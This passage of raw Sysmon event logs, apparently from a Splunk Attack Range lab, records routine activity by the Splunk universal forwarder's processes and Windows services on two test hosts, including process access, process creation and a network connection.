Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C413CD137CE3735906E135A4A4A0565D,SHA256=23FFC01BEA04F8FFA4D29A17F307FDFFC44E79184212A54ECAFAFC2C342CE619,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298731Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:42.616{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49557-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000222564Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:44.680{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1940-6216-4105-000000003902}3456C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222563Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:44.680{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222562Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:44.680{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222561Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:44.680{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222560Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:44.680{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222559Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:44.680{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222558Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:44.680{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222557Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:44.680{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222556Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:44.680{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222555Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:44.680{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1940-6216-4105-000000003902}3456C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222554Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:44.680{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222553Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:44.680{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1940-6216-4105-000000003902}3456C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222552Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:44.681{4F8D34B0-1940-6216-4105-000000003902}3456C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000222551Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:44.180{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1940-6216-4005-000000003902}2060C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222550Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:44.180{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222549Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:44.180{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222548Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:44.180{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222547Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:44.180{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222546Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:44.180{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222545Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:44.180{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222544Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:44.180{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222543Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:44.180{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222542Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:44.180{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222541Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:44.180{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1940-6216-4005-000000003902}2060C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222540Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:44.180{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1940-6216-4005-000000003902}2060C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222539Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:44.181{4F8D34B0-1940-6216-4005-000000003902}2060C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 